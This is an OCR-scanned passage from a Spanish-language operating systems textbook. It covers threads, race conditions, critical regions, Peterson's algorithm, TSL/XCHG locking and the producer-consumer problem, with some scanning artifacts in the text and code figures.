variables globales, por lo que se evitan los conflictos. En efecto, esta decisión crea un nivel de al¬ 
cance en el que las variables están visibles para todos los procedimientos de un hilo, además de los 
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niveles de alcance existentes en los que las variables están visibles sólo para un procedimiento y en 
los que las variables están visibles en todas partes del programa. 



Figura 2-20. Los hilos pueden tener variables globales privadas. 

Sin embargo, acceder a las variables globales privadas es algo problemático, ya que la mayo¬ 
ría de los lenguajes de programación tienen una manera de expresar las variables locales y las va¬ 
riables globales, pero no formas intermedias. Es posible asignar un trozo de memoria para las 
variables globales y pasarlo a cada procedimiento en el hilo como un parámetro adicional. Aunque 
no es una solución elegante, funciona. 

De manera alternativa, pueden introducirse nuevos procedimientos de biblioteca para crear, es¬ 
tablecer y leer estas variables globales a nivel de hilo. La primera llamada podría ser como se mues¬ 
tra a continuación: 

create_g lobal (“bufptr”); 

Esta llamada asigna espacio de almacenamiento para un apuntador llamado bufptr en el heap (pila 
para memoria dinámica) o en un área especial de almacenamiento reservada para el hilo invocador. 
Sin importar dónde se asigne el espacio de almacenamiento, sólo el hilo invocador tiene acceso a 
la variable global; si otro hilo crea una variable global con el mismo nombre, obtiene una ubicación 
distinta de almacenamiento que no entre en conflicto con la existente. 

Se necesitan dos llamadas para acceder a las variables globales: una para escribirlas y la otra 
para leerlas. Para escribir, algo como: 

set_global(“bufptr”, &buf); 

es suficiente. Esta llamada almacena el valor de un apuntador en la ubicación de almacenamiento 
que se creó previamente mediante la llamada a create_global. Para leer una variable global, la lla¬ 
mada podría ser algo como lo siguiente: 

bufptr = read_g lobal (“bufptr”); 

Esta llamada devuelve la dirección almacenada en la variable global, de manera que se pueda acce¬ 
der a sus datos. 
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El siguiente problema al convertir un programa con un solo hilo en un programa con múltiples 
hilos es que muchos procedimientos de biblioteca no son re-entrantes; es decir, no se diseñaron pa¬ 
ra hacer una segunda llamada a cualquier procedimiento dado mientras que una llamada anterior no 
haya terminado. Por ejemplo, podemos programar el envío de un mensaje a través de la red ensam¬ 
blando el mensaje en un búfer fijo dentro de la biblioteca, para después hacer un trap al kernel pa¬ 
ra enviarlo. ¿Qué ocurre si un hilo ha ensamblado su mensaje en el búfer y después una interrupción 
de reloj obliga a que se haga la conmutación a un segundo hilo que de inmediato sobrescribe el bú¬ 
fer con su propio mensaje? 

De manera similar, los procedimientos de asignación de memoria (como malloc en UNIX) 
mantienen tablas cruciales acerca del uso de memoria; por ejemplo, una lista ligada de trozos dis¬ 
ponibles de memoria. Mientras el procedimiento malloc está ocupado actualizando estas listas, pue¬ 
den estar temporalmente en un estado inconsistente, con apuntadores que apuntan a ningún lado. Si 
ocurre una conmutación de hilos mientras las tablas son inconsistentes y llega una nueva llamada 
de un hilo distinto, tal vez se utilice un apuntador inválido y se produzca un fallo en el programa. 
Para corregir estos problemas de manera efectiva, tal vez sea necesario reescribir la biblioteca com¬ 
pleta, lo que no es insignificante. 

Una solución distinta es proporcionar a cada procedimiento una envoltura que fije un bit pa¬ 
ra marcar la librería como si estuviera en uso. Si otro hilo intenta usar un procedimiento de biblio¬ 
teca mientras no se haya completado una llamada anterior, se bloquea. Aunque se puede hacer que 
este método funcione, elimina en gran parte el paralelismo potencial. 

Ahora, considere las señales. Algunas señales son lógicamente específicas para cada hilo, 
mientras que otras no. Por ejemplo, si un hilo llama a alarm, tiene sentido que la señal resultante 
vaya al hilo que hizo la llamada. Sin embargo, cuando los hilos se implementan totalmente en es¬ 
pacio de usuario, el kernel no sabe siquiera acerca de los hilos, por lo que apenas si puede dirigir la 
señal al hilo correcto. Hay una complicación adicional si un proceso puede tener sólo una alarma 
pendiente a la vez y varios hilos pueden llamar a alarm de manera independiente. 

Otras señales, como la interrupción del teclado, no son específicas para cada hilo. ¿Quién de¬ 
be atraparlas? ¿Un hilo designado? ¿Todos los hilos? ¿Un hilo emergente recién creado? Lo que 
es más, ¿qué ocurre si un hilo cambia los manejadores de señales sin indicar a los demás hilos? 
¿Y qué ocurre si un hilo desea atrapar una señal específica (por ejemplo, cuando el usuario opri¬ 
me CTRL-C) y otro hilo desea esta señal para terminar el proceso? Esta situación puede surgir si 
uno o más hilos ejecutan procedimientos de biblioteca estándar y otros son escritos por el usua¬ 
rio. Es evidente que estos deseos son incompatibles. En general, las señales son bastante difíci¬ 
les de manejar en un entorno con un solo hilo. Cambiar a un entorno con multihilamiento no 
facilita su manejo. 

Un último problema que introducen los hilos es la administración de la pila. En muchos siste¬ 
mas, cuando la pila de un proceso se desborda, el kernel sólo proporciona más pila a ese proceso 
de manera automática. Cuando un proceso tiene múltiples hilos, también debe tener varias pilas. Si 
el kernel no está al tanto de todas ellas, no puede hacer que su tamaño aumente de manera automá¬ 
tica cuando ocurra un fallo de la pila. De hecho, ni siquiera puede detectar que un fallo de memo¬ 
ria está relacionado con el aumento de tamaño de la pila de algún otro hilo. 

Sin duda estos problemas no son imposibles de resolver, pero muestran que no se resolverán 
con sólo introducir hilos en un sistema existente sin un rediseño considerable del mismo sistema. 
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Tal vez haya que redefinir la semántica de las llamadas al sistema y reescribir las bibliotecas, cuan¬ 
do menos. Y todo esto se debe realizar de tal forma que se mantenga una compatibilidad hacia atrás 
con los programas existentes para el caso limitante de un proceso con sólo un hilo. Para obtener in¬ 
formación adicional acerca de los hilos, consulte (Hauser y colaboradores, 1993; y Marsh y colabo¬ 
radores, 1991). 


2.3 COMUNICACIÓN ENTRE PROCESOS 

Con frecuencia, los procesos necesitan comunicarse con otros procesos. Por ejemplo, en una cana¬ 
lización del Shell, la salida del primer proceso se debe pasar al segundo proceso y así sucesivamen¬ 
te. Por ende, existe una necesidad de comunicación entre procesos, de preferencia en una forma 
bien estructurada sin utilizar interrupciones. En las siguientes secciones analizaremos algunas de las 
cuestiones relacionadas con esta comunicación entre procesos o I PC. 

En resumen, hay tres cuestiones aquí. La primera se alude a lo anterior: cómo un proceso pue¬ 
de pasar información a otro. La segunda está relacionada con hacer que dos o más procesos no se 
interpongan entre sí; por ejemplo, dos procesos en un sistema de reservaciones de una aerolínea, 
cada uno de los cuales trata de obtener el último asiento en un avión para un cliente distinto. La 
tercera trata acerca de obtener la secuencia apropiada cuando hay dependencias presentes: si el 
proceso A produce datos y el proceso B los imprime, B tiene que esperar hasta que A haya produ¬ 
cido algunos datos antes de empezar a imprimir. En la siguiente sección analizaremos las tres cues¬ 
tiones. 

También es importante mencionar que dos de estas cuestiones se aplican de igual forma a los 
hilos. La primera (el paso de información) es fácil para los hilos, ya que comparten un espacio de 
direcciones común (los hilos en distintos espacios de direcciones que necesitan comunicarse entran 
en la categoría de los procesos en comunicación). Sin embargo, las otras dos (evitar que un hilo en¬ 
tre en conflicto con los demás y obtener la secuencia apropiada) se aplican de igual forma a los hi¬ 
los. Existen los mismos problemas y se aplican las mismas soluciones. A continuación veremos 
el problema en el contexto de los procesos, pero tenga en cuenta que también se aplican los mismos 
problemas y soluciones a los hilos. 


2.3.1 C ondiciones de carrera 

En algunos sistemas operativos, los procesos que trabajan en conjunto pueden compartir cierto es¬ 
pacio de almacenamiento en el que pueden leer y escribir datos. El almacenamiento compartido 
puede estar en la memoria principal (posiblemente en una estructura de datos del kernel) o puede 
ser un archivo compartido; la ubicación de la memoria compartida no cambia la naturaleza de la co¬ 
municación o los problemas que surgen. Para ver cómo funciona la comunicación entre procesos en 
la práctica, consideremos un ejemplo simple pero común: un spooler de impresión. Cuando un pro¬ 
ceso desea imprimir un archivo, introduce el nombre del archivo en un directorio de spooier espe¬ 
cial. Otro proceso, el demonio de impresión, comprueba en forma periódica si hay archivos que 
deban imprimirse y si los hay, los imprime y luego elimina sus nombres del directorio. 
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Imagine que nuestro directorio de spooler tiene una cantidad muy grande de ranuras, numera¬ 
das como 0, I, 2, cada una de ellas capaz de contener el nombre de un archivo. Imagine tam¬ 
bién que hay dos variables compartidas: sal, que apunta al siguiente archivo a imprimir, y ent, que 
apunta a la siguiente ranura libre en el directorio. Estas dos variables podrían mantenerse muy bien 
en un archivo de dos palabras disponible para todos los procesos. En cierto momento, las ranuras 
de la 0 a la 3 están vacías (ya se han impreso los archivos) y las ranuras de la 4 a la 6 están llenas 
(con los nombres de los archivos en la cola de impresión). De manera más o menos simultánea, los 
procesos A y B deciden que desean poner en cola un archivo para imprimirlo. Esta situación se 
muestra en la figura 2-21. 


Directorio 
de spooler 



sal = 4 


ent = 7 


Figura 2-21. Dos procesos desean acceder a la memoria compartida al mismo tiempo. 


En las jurisdicciones en las que se aplica la ley de Murphy^ podría ocurrir lo siguiente. El pro¬ 
ceso A lee ent y guarda el valor 7 en una variable local, llamada siguiente_ranura_libre. Justo en¬ 
tonces ocurre una interrupción de reloj y la CPU decide que el proceso A se ha ejecutado durante 
un tiempo suficiente, por lo que conmuta al proceso B . El proceso B también lee ent y también ob¬ 
tiene un 7. De igual forma lo almacena en SU variable local siguiente_ranura_libre. En este instan¬ 
te, ambos procesos piensan que la siguiente ranura libre es la 7. 

Ahora el proceso B continúa su ejecución. Almacena el nombre de su archivo en la ranura 7 y 
actualiza ent para que sea 8. Después realiza otras tareas. 

En cierto momento el proceso A se ejecuta de nuevo, partiendo del lugar en el que se quedó. 
Busca en siguiente_ranura_libre, encuentra un 7 y escribe el nombre de su archivo en la ranura 7, 
borrando el nombre que el proceso B acaba de poner ahí. Luego calcula siguiente_ranura_libre H- 
1, que es 8 y fija ent para que sea 8. El directorio de spooler es ahora internamente consistente, por 


t 


Si algo puede salir mal, lo hará. 
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lo que el demonio de impresión no detectará nada incorrecto, pero el proceso B nunca recibirá nin¬ 
guna salida. 

El usuario B esperará en el cuarto de impresora por años, deseando con vehemencia obtener la 
salida que nunca llegará. Situaciones como ésta, en donde dos o más procesos están leyendo o es¬ 
cribiendo algunos datos compartidos y el resultado final depende de quién se ejecuta y exactamen¬ 
te cuándo lo hace, se conocen como condiciones de carrera. Depurar programas que contienen 
condiciones de carrera no es nada divertido. Los resultados de la mayoría de las ejecuciones de 
prueba están bien, pero en algún momento poco frecuente ocurrirá algo extraño e inexplicable. 

2.3.2 Regiones críticas 

¿Cómo evitamos las condiciones de carrera? La clave para evitar problemas aquí y en muchas otras 
situaciones en las que se involucran la memoria compartida, los archivos compartidos y todo lo de¬ 
más compartido es buscar alguna manera de prohibir que más de un proceso lea y escriba los datos 
compartidos al mismo tiempo. Dicho en otras palabras, lo que necesitamos es exclusión mutua, 
cierta forma de asegurar que si un proceso está utilizando una variable o archivo compartido, los 
demás procesos se excluirán de hacer lo mismo. La dificultad antes mencionada ocurrió debido a 
que el proceso B empezó a utilizar una de las variables compartidas antes de que el proceso A ter¬ 
minara con ella. La elección de operaciones primitivas apropiadas para lograr la exclusión mutua 
es una cuestión de diseño importante en cualquier sistema operativo y un tema que analizaremos 
con mayor detalle en las siguientes secciones. 

El problema de evitar las condiciones de carrera también se puede formular de una manera abs¬ 
tracta. Parte del tiempo, un proceso está ocupado realizando cálculos internos y otras cosas que no 
producen condiciones de carrera. Sin embargo, algunas veces un proceso tiene que acceder a la me¬ 
moria compartida o a archivos compartidos, o hacer otras cosas críticas que pueden producir carre¬ 
ras. Esa parte del programa en la que se accede a la memoria compartida se conoce como región 
crítica o sección crítica. Si pudiéramos ordenar las cosas de manera que dos procesos nunca estu¬ 
vieran en sus regiones críticas al mismo tiempo, podríamos evitar las carreras. 

Aunque este requerimiento evita las condiciones de carrera, no es suficiente para que los pro¬ 
cesos en paralelo cooperen de la manera correcta y eficiente al utilizar datos compartidos. Necesi¬ 
tamos cumplir con cuatro condiciones para tener una buena solución: 

1. No puede haber dos procesos de manera simultánea dentro de sus regiones críticas. 

2. No pueden hacerse suposiciones acerca de las velocidades o el número de CPUs. 

3. Ningún proceso que se ejecute fuera de su región crítica puede bloquear otros procesos. 

4. Ningún proceso tiene que esperar para siempre para entrar a su región crítica. 

En sentido abstracto, el comportamiento que deseamos se muestra en la figura 2-22. Aquí el 
proceso A entra a su región crítica en el tiempo T^. Un poco después, en el tiempo Tj el proceso 
B intenta entrar a su región crítica, pero falla debido a que otro proceso ya se encuentra en su 
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región crítica y sólo se permite uno a la vez. En consecuencia, B se suspende temporalmente has¬ 
ta el tiempo Tj cuando A sale de su región crítica, con lo cual se permite a B entrar de inmediato. 
En algún momento dado B sale (en T^) y regresamos a la situación original, sin procesos en sus 
regiones críticas. 


Proceso A 


Proceso B 


A entra a su región crítica 

/ 


A sale de su región crítica 

/ 



1 

1 

1 

1 

1 

1 

-r 

1 

1 

1 

1 

; 
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1 

B intenta entrar . 

a su región 
/ crítica 

/. Y 

B entra a su 
región crítica 

/ 

1 

1 

B sale de su 
región crítica 

1 

1 



— 1 

1 

1 

Y 1 


1 


B se bloquea 


T 


4 


Tiempo -► 

Figura 2-22. Exclusión mutua mediante el uso de regiones críticas. 


2.3.3 Exclusión mutua con espera ocupada 

En esta sección examinaremos varias proposiciones para lograr la exclusión mutua, de manera que 
mientras un proceso esté ocupado actualizando la memoria compartida en su región crítica, ningún 
otro proceso puede entrar a SU región crítica y ocasionar problemas. 


Deshabilitando interrupciones 

En un sistema con un solo procesador, la solución más simple es hacer que cada proceso deshabilite 
todas las interrupciones justo después de entrar a su región crítica y las rehabilite justo después de 
salir. Con las interrupciones deshabilitadas, no pueden ocurrir interrupciones de reloj. Después de to¬ 
do, la CPU sólo se conmuta de un proceso a otro como resultado de una interrupción del reloj o de 
otro tipo, y con las interrupciones desactivadas la CPU no se conmutará a otro proceso. Por ende, 
una vez que un proceso ha deshabilitado las interrupciones, puede examinar y actualizar la memoria 
compartida sin temor de que algún otro proceso intervenga. 

Por lo general este método es poco atractivo, ya que no es conveniente dar a los procesos de 
usuario el poder para desactivar las interrupciones. Suponga que uno de ellos lo hiciera y nunca las 
volviera a activar. Ése podría ser el fin del sistema; aún más: si el sistema es un multiprocesador 
(con dos o posiblemente más CPUs), al deshabilitar las interrupciones sólo se ve afectada la CPU 
que ejecutó la instrucción disable. Las demás continuarán ejecutándose y pueden acceder a la me¬ 
moria compartida. 


















SECCIÓN 2.3 


COMUNICACIÓN ENTRE PROCESOS 


121 


Por otro lado, con frecuencia es conveniente para el mismo kernel deshabilitar las interrupcio¬ 
nes por unas cuantas instrucciones mientras actualiza variables o listas. Por ejemplo, si ocurriera 
una interrupción mientras la lista de procesos se encuentra en un estado inconsistente, podrían pro¬ 
ducirse condiciones de carrera. La conclusión es que a menudo deshabilitar interrupciones es una 
técnica útil dentro del mismo sistema operativo, pero no es apropiada como mecanismo de exclu¬ 
sión mutua general para los procesos de usuario. 

La posibilidad de lograr la exclusión mutua al deshabilitar las interrupciones (incluso dentro 
del kemel) está disminuyendo día con día debido al creciente número de chips multinúcleo que se 
encuentran hasta en las PCs de bajo rendimiento. Ya es común que haya dos núcleos, las máquinas 
actuales de alto rendimiento tienen cuatro y dentro de poco habrá ocho o 16. En un multinúcleo (es 
decir, sistema con multiprocesadores) al deshabilitar las interrupciones de una CPU no se evita que 
las demás CPUs interfieran con las operaciones que la primera CPU está realizando. En consecuen¬ 
cia, se requieren esquemas más sofisticados. 


Variables de candado 

Como segundo intento, busquemos una solución de software. Considere tener una sola variable 
compartida (de candado), que al principio es 0. Cuando un proceso desea entrar a su región crí¬ 
tica primero evalúa el candado. Si este candado es 0, el proceso lo fija en 1 y entra a la región 
crítica. Si el candado ya es 1 sólo espera hasta que el candado se haga 0. Por ende, un 0 signifi¬ 
ca que ningún proceso está en su región crítica y un 1 significa que algún proceso está en su re¬ 
gión crítica. 

Por desgracia, esta idea contiene exactamente el mismo error fatal que vimos en el directorio 
de spooler. Suponga que un proceso lee el candado y ve que es 0. Antes de que pueda fijar el can¬ 
dado a 1, otro proceso se planifica para ejecutarse y fija el candado a 1. Cuando el primer proceso 
se ejecuta de nuevo, también fija el candado a 1 y por lo tanto dos procesos se encontrarán en sus 
regiones críticas al mismo tiempo. 

Ahora el lector podría pensar que podemos resolver este problema si leemos primero el valor 
de candado y después lo verificamos de nuevo justo antes de almacenar el nuevo valor en él, pero 
en realidad eso no ayuda. La condición de carrera se produce ahora si el segundo proceso modifica 
el candado justo después que el primer proceso haya terminado su segunda verificación. 

Alternancia estricta 

En la figura 2-23 se muestra la tercera solución para el problema de la exclusión mutua. Este frag¬ 
mento de programa, al igual que casi todos los demás en este libro, está escrito en C. Aquí elegi¬ 
mos el lenguaje C debido a que los sistemas operativos reales casi siempre se escriben en C (o en 
algunas ocasiones, en C-H-), pero casi nunca en lenguajes como Java, Modula 3 o Pascal. C es po¬ 
tente, eficiente y predecible, características cruciales para escribir sistemas operativos. Por ejem¬ 
plo, Java no es predecible debido a que se podría agotar el espacio de almacenamiento en un 
momento crítico y tendría que invocar al recolector de basura para reclamar la memoria en un mo¬ 
mento verdaderamente inoportuno. Esto no puede ocurrir en C, debido a que no hay recolección 
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de basura. Una comparación cuantitativa de C, C++, Java y cuatro lenguajes más se proporciona 
en (Prechelt, 2000). 


while (TRUE) { 

while (turno != 0) /* ciclo V ; 

region_critica(); 

turno = 1; 

region_nocritica(); 

} 

(a) 


while (TRUE) { 

while (turno != 1) /* ciclo */; 

region_critica(); 

turno = 0; 

region_nocritica(); 

} 

(b) 


Figura 2-23. Una solución propuesta para el problema de la región crítica, (a) Proce¬ 
so 0. (b) Proceso 1. En ambos casos, asegúrese de tener en cuenta los signos de punto 
y coma que terminan las instrucciones while. 


En la figura 2-23, la variable entera turno (que al principio es 0) lleva la cuenta acerca de a qué 
proceso le toca entrar a su región crítica y examinar o actualizar la memoria compartida. Al principio, 
el proceso 0 inspecciona turno, descubre que es 0 y entra a su región critica. El proceso 1 también des¬ 
cubre que es 0 y por lo tanto se queda en un ciclo estrecho, evaluando turno en forma continua para 
ver cuándo se convierte en 1. A la acción de evaluar en forma continua una variable hasta que aparez¬ 
ca cierto valor se le conoce como espera ocupada. Por lo general se debe evitar, ya que desperdicia 
tiempo de la CPU. La espera ocupada sólo se utiliza cuando hay una expectativa razonable de que la 
espera será corta. A un candado que utiliza la espera ocupada se le conoce como candado de giro. 

Cuando el proceso 0 sale de la región crítica establece turno a 1, para permitir que el proceso 
1 entre a su región critica. Suponga que el proceso 1 sale rápidamente de su región crítica, de ma¬ 
nera que ambos procesos se encuentran en sus regiones no críticas, con turno establecido en 0. Aho¬ 
ra el proceso 0 ejecuta todo su ciclo rápidamente, saliendo de su región crítica y estableciendo turno 
a 1. En este punto, turno es 1 y ambos procesos se están ejecutando en sus regiones no críticas. 

De repente, el proceso 0 termina en su región no crítica y regresa a la parte superior de su ci¬ 
clo. Por desgracia no puede entrar a su región crítica ahora, debido a que turno es 1 y el proce¬ 
so 1 está ocupado con su región no crítica. El proceso 0 espera en su ciclo while hasta que el pro¬ 
ceso 1 establezca turno a 0. Dicho en forma distinta, tomar turnos no es una buena idea cuando 
uno de los procesos es mucho más lento que el otro. 

Esta situación viola la condición 3 antes establecida; el proceso 0 está siendo bloqueado por un 
proceso que no está en su región crítica. Volviendo al directorio de spooler antes mencionado, si 
ahora asociamos la región crítica con la lectura y escritura del directorio de spooler, el proceso 0 no 
podría imprimir otro archivo debido a que el proceso 1 está haciendo otra cosa. 

De hecho, esta solución requiere que los dos procesos se alternen de manera estricta al entrar 
en sus regiones críticas (por ejemplo, al poner archivos en la cola de impresión). Ninguno podría 
poner dos archivos en la cola al mismo tiempo. Aunque este algoritmo evita todas las condiciones 
de carrera, en realidad no es un candidato serio como solución, ya que viola la condición 3. 
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Solución de Peterson 

AI combinar la idea de tomar turnos con la idea de las variables de candado y las variables de ad¬ 
vertencia, un matemático holandés llamado T. Dekker fue el primero en idear una solución de soft¬ 
ware para el problema de la exclusión mutua que no requiere de una alternancia estricta. Para ver 
un análisis del algoritmo de Dekker, consulte (Dijkstra, 1965). 

En 1981, G.L. Peterson descubrió una manera mucho más simple de lograr la exclusión mu¬ 
tua, con lo cual la solución de Dekker se hizo obsoleta. El algoritmo de Peterson se muestra en la 
figura 2-24. Este algoritmo consiste de dos procedimientos escritos en ANSI C, lo cual significa que 
se deben suministrar prototipos para todas las funciones definidas y utilizadas. Sin embargo, para 
ahorrar espacio no mostraremos los prototipos en este ejemplo ni en los siguientes. 


#define FALSE 0 
#defineTRUE 1 
#define N 2 

int turno; 

int interesado[N]; 

void entrar_reg¡on(¡nt proceso); 

{ 

int otro; 

otro = 1 - proceso; 
interesado[proceso] = TRUE; 
turno = proceso; 

while (turno == proceso && interesado[otro] 


void salir_region(int proceso) 

{ 

interesado[proceso] = FALSE; 

} 


/* número de procesos 7 

/* ¿de quién es el turno? 7 

/* al principio todos los valores son 0 (FALSE) 7 

/* el proceso es 0 o 1 7 

/* número del otro proceso 7 


/* proceso: quién está saliendo 7 
/* indica que salió de la región crítica 7 


/* el opuesto del proceso 7 
/* muestra que está interesado 7 
/* establece la bandera 7 
== TRUE) /* instrucción nula 7; 


Figura 2-24. Solución de Peterson para lograr la exclusión mutua. 


Antes de utilizar las variables compartidas (es decir, antes de entrar a su región crítica), cada 
proceso llama a entrar_region con su propio número de proceso (0 o 1) como parámetro. Esta lla¬ 
mada hará que espere, si es necesario, hasta que sea seguro entrar. Una vez que haya terminado con 
las variables compartidas, el proceso llama a sal ir_región para indicar que ha terminado y permitir 
que los demás procesos entren, si así lo desea. 

Veamos cómo funciona esta solución. Al principio ningún proceso se encuentra en su región 
crítica. Ahora el proceso 0 llama a entrar_region. Indica su interés estableciendo su elemento del 
arreglo y fija turno a 0. Como el proceso 1 no está interesado, entrar_region regresa de inmediato. 
Si ahora el proceso 1 hace una llamada a entrar_region, se quedará ahí hasta que interesado[0] sea 
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FALSE, un evento que sólo ocurre cuando el proceso 0 llama a sa I ir_región para salir de la región 
crítica. 

Ahora considere el caso en el que ambos procesos llaman a entrar_region casi en forma simul¬ 
tánea. Ambos almacenarán su número de proceso en turno. Cualquier almacenamiento que se haya 
realizado al último es el que cuenta; el primero se sobrescribe y se pierde. Suponga que el proceso 
1 almacena al último, por lo que turno es 1. Cuando ambos procesos llegan a la instrucción while, 
el proceso 0 la ejecuta 0 veces y entra a su región crítica. El proceso 1 itera y no entra a su región 
crítica sino hasta que el proceso 0 sale de su región crítica. 

La instrucción TSL 

Ahora veamos una proposición que requiere un poco de ayuda del hardware. Algunas computado¬ 
ras, en especial las diseñadas con varios procesadores en mente, tienen una instrucción tal como 

TSL REGISTRO, CANDADO 

(Evaluar y fijar el candado) que funciona de la siguiente manera. Lee el contenido de la palabra de 
memoria candado y lo guarda en el registro RX, y después almacena un valor distinto de cero en la 
dirección de memoria candado. Se garantiza que las operaciones de leer la palabra y almacenar un 
valor en ella serán indivisibles; ningún otro procesador puede acceder a la palabra de memoria si¬ 
no hasta que termine la instrucción. La CPU que ejecuta la instrucción TSL bloquea el bus de me¬ 
moria para impedir que otras CPUs accedan a la memoria hasta que termine. 

Es importante observar que bloquear el bus de memoria es una acción muy distinta de la de des¬ 
habilitar las interrupciones. Al deshabilitar las interrupciones y después realizar una operación de lec¬ 
tura en una palabra de memoria, seguida de una operación de escritura, no se evita que un segundo 
procesador en el bus acceda a la palabra entre la lectura y la escritura. De hecho, si se deshabilitan 
las interrupciones en el procesador 1 no se produce efecto alguno en el procesador 2. La única for¬ 
ma de mantener el procesador 2 fuera de la memoria hasta que el procesador 1 termine es bloquear 
el bus, para lo cual se requiere una herramienta de hardware especial (básicamente, una línea de bus 
que afirme que el bus está bloqueado y no disponible para los demás procesadores aparte del que lo 
bloqueó). 

Para usar la instrucción TSL necesitamos una variable compartida (candado) que coordine el ac¬ 
ceso a la memoria compartida. Cuando candado es 0, cualquier proceso lo puede fijar en 1 median¬ 
te el uso de la instrucción TSL y después una lectura o escritura en la memoria compartida. Cuando 
termina, el proceso establece candado de vuelta a 0 mediante una instrucción move ordinaria. 

¿Cómo se puede utilizar esta instrucción para evitar que dos procesos entren al mismo tiempo 
en sus regiones críticas? La solución se proporciona en la figura 2-25, donde se muestra una subru¬ 
tina de cuatro instrucciones en un lenguaje ensamblador ficticio (pero común). La primera instruc¬ 
ción copia el antiguo valor de candado en el registro y después fija el candado a 1. Después, el valor 
anterior se compara con 0. Si es distinto de cero, el candado ya estaba cerrado, por lo que el progra¬ 
ma sólo regresa al principio y lo vuelve a evaluar. Tarde o temprano se volverá 0 (cuando el proce¬ 
so que esté actualmente en su región crítica se salga de ella) y la subrutina regresará, con el bloqueo 
establecido. Es muy simple quitar el bloqueo. El programa sólo almacena un 0 en candado. No se 
necesitan instrucciones especiales de sincronización. 
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entrar_region: 


TSL REGISTRO,CANDADO 
CMP REGISTRO,#0 
JNE entrar_region 
RET 


Icopia candado al registro y fija candado a 1 
|¿era candado cero? 

|si era distinto de cero, ei candado está cerrado, y se repite 
¡regresa ai iiamador; entra a región crítica 


saiir_region: 


MOVE CANDADO,#0 
RET 


laimacena 0 en candado 
¡regresa ai iiamador 


Figura 2-25. Cómo entrar y salir de una región crítica mediante la instrucción TSL. 


Ahora tenemos una solución simple y directa para el problema de regiones críticas. Antes de 
entrar a su región crítica, un proceso llama a entrar_region, que lleva a cabo una espera ocupada 
hasta que el candado está abierto; después adquiere el candado y regresa. Después de la región crí¬ 
tica, el proceso llama a sal ir_región, que almacena un 0 en candado. Al igual que con todas las so¬ 
luciones basadas en regiones críticas, los procesos deben llamar a entrar_region y salir_region en 
los momentos correctos para que el método funcione. Si un proceso hace trampa, la exclusión mu¬ 
tua fallará. 

Una instrucción alternativa para TSL es XCHG, que intercambia el contenido de dos ubicaciones 
en forma atómica; por ejemplo, un registro y una palabra de memoria. El código se muestra en la 
figura 2-26 y como se puede ver, es en esencia el mismo que la solución con TSL. Todas las CPUs 
Intel x86 utilizan la instrucción XCHG para la sincronización de bajo nivel. 


entrar_region: 


MOVE REGISTRO,#1 

XCHG REGISTRO,CANDADO 

CMP REGISTRO,#0 

JNE entrar_region 

RET 


Icoloca 1 en el registro 

¡intercambia ei contenido dei registro y ia variable candado 
|¿era candado cero? 

|si era distinto de cero, el candado está cerrado, y se repite 
¡regresa al que hizo la llamada; entra a región crítica 


salir_region: 


MOVE CANDADO,#0 
RET 


¡almacena 0 en candado 
¡regresa al que hizo la llamada 


Figura 2-26. Cómo entrar y salir de una región crítica mediante la instrucción XCHG. 


2.3.4 Dormir y despertar 


Tanto la solución de Peterson como las soluciones mediante TSL o XCHG son correctas, pero to¬ 
das tienen el defecto de requerir la espera ocupada. En esencia, estas soluciones comprueban si se 
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permite la entrada cuando un proceso desea entrar a su región crítica. Si no se permite, el proceso 
sólo espera en un ciclo estrecho hasta que se permita la entrada. 

Este método no sólo desperdicia tiempo de la CPU, sino que también puede tener efectos ines¬ 
perados. Considere una computadora con dos procesos: H con prioridad alta y L con prioridad ba¬ 
ja. Las reglas de planificación son tales que H se ejecuta cada vez que se encuentra en el estado 
listo. En cierto momento, con L en su región crítica, H cambia al estado listo para ejecutarse (por 
ejemplo, cuando se completa una operación de E/S). Entonces H empieza la espera ocupada, pero 
como L nunca se planifica mientras H está en ejecución, L nunca tiene la oportunidad de salir de su 
región crítica, por lo que H itera en forma indefinida. A esta situación se le conoce algunas veces 
como el problema de inversión de prioridades. 

Veamos ahora ciertas primitivas de comunicación entre procesos que bloquean en vez de des¬ 
perdiciar tiempo de la CPU cuando no pueden entrar a sus regiones críticas. Una de las más sim¬ 
ples es el par sleep (dormir) y wakeup (despertar). Sleep es una llamada al sistema que hace que 
el proceso que llama se bloquee o desactive, es decir, que se suspenda hasta que otro proceso lo des¬ 
pierte. La llamada wakeup tiene un parámetro, el proceso que se va a despertar o activar. De mane¬ 
ra alternativa, tanto sleep como wakeup tienen un parámetro, una dirección de memoria que se 
utiliza para asociar las llamadas a sleep con las llamadas a wakeup. 

El problema del productor-consumidor 

Como ejemplo de la forma en que se pueden utilizar estas primitivas, consideremos el problema del 
productor-consumidor (conocido también como el problema del búfer limitado). Dos procesos 
comparten un búfer común, de tamaño fijo. Uno de ellos (el productor) coloca información en el 
búfer y el otro (el consumidor) la saca (también es posible generalizar el problema de manera que 
haya m productores y n consumidores, pero sólo consideraremos el caso en el que hay un produc¬ 
tor y un consumidor, ya que esta suposición simplifica las soluciones). 

El problema surge cuando el productor desea colocar un nuevo elemento en el búfer, pero éste 
ya se encuentra lleno. La solución es que el productor se vaya a dormir (se desactiva) y que se des¬ 
pierte (se active) cuando el consumidor haya quitado uno o más elementos. De manera similar, si 
el consumidor desea quitar un elemento del búfer y ve que éste se encuentra vacío, se duerme has¬ 
ta que el productor coloca algo en el búfer y lo despierta. 

Este método suena lo bastante simple, pero produce los mismos tipos de condiciones de carre¬ 
ra que vimos antes con el directorio de spooler. Para llevar la cuenta del número de elementos en el 
búfer, necesitamos una variable (cuenta). Si el número máximo de elementos que puede contener 
el búfer es N , el código del productor comprueba primero si cuenta es N . Si lo es, el productor se 
duerme; si no lo es, el productor agrega un elemento e incrementará cuenta. 

El código del consumidor es similar: primero evalúa cuenta para ver si es 0. Si lo es, se duer¬ 
me; si es distinta de cero, quita un elemento y disminuye el contador cuenta. Cada uno de los pro¬ 
cesos también comprueba si el otro se debe despertar y de ser así, lo despierta. El código para el 
productor y el consumidor se muestra en la figura 2-27. 

Para expresar llamadas al sistema como sleep y wakeup en C, las mostraremos como llamadas 
a rutinas de la biblioteca. No forman parte de la biblioteca estándar de C, pero es de suponer que 
estarán disponibles en cualquier sistema que tenga realmente estas llamadas al sistema. 
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#define N 100 
int cuenta = 0; 

void productor(void) 

{ 

int elemento; 
while (TRUE) { 

elemento = producir_elemento(); 
if (cuenta == N) sleep(); 
insertar_elemento(elemento); 
cuenta = cuenta + 1; 
if (cuenta == 1) wakeup(consumidor); 

} 

} 


void consumidor(void) 

{ 

int elemento; 

while (TRUE) { 

if (cuenta == 0) sleep(); 
elemento = quitar_elemento(); 
cuenta = cuenta - 1; 
if (cuenta==N-1) wakeup(productor); 
consumir_elemento(elemento); 

} 

